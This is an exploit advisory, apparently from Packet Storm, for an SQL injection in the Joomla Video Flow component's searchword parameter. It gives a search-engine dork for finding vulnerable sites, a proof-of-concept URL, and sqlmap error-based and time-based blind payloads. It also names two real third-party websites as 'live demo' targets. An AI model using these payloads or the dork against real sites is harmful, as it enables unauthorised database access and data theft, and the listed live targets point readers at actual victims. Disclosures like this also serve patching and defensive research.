Joomla Video Flow component versions 1.1.3 through 1.1.5 suffer from a remote SQL injection vulnerability.
c6933ed1622fde52df5cb8ec589f674635f3f68310d7cffb2bf313ed22398e5a######################
# ____ _ ____ ____ ___ ____ _ ____ _
# __ _| __ ) / \ | _ \ / ___|_ _| _ \| | |___ \/ |
# \ \/ / _ \ / _ \ | | | | | _ | || |_) | | __) | |
# > <| |_) / ___ \| |_| | |_| || || _ <| |___ / __/| |
# /_/\_\____/_/ \_\____/ \____|___|_| \_\_____|_____|_|
#
######################
# Exploit Title : Joomla com_videoflow SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_videoflow
# Vendor Homepage : http://www.fidsoft.com
# version : 1.1.3 - 1.1.5
# Tested on: [ BACK BOX]
# skype:xbadgirl21
# Date: 04/08/2016
# video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U
######################
# [+] DESCRIPTION :
######################
# [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes
sharing multimedia content across
# [+] the two platforms a breeze. Visit www.videoflow.tv for more
information, support and demos.
# [+] AND an SQL injection been Detected in this Joomla components
videoflow after you add ['] to
# [+] Vuln Target Parameter you will get error like :
# [!] You have an error in your SQL syntax; check the manual that
corresponds to your MySQL
# [!] server version for the right syntax to use near ''' at line 1
SQL=SELECT
######################
# [+] Poc :
######################
# [searchword] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1
'
######################
# [+] SQLmap PoC:
######################
# ---
#Parameter: searchword (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
# Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND
(SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT
#(ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
# Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND
(SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO
#
######################
# [!] Live Demo :
######################
#
http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1
#
http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed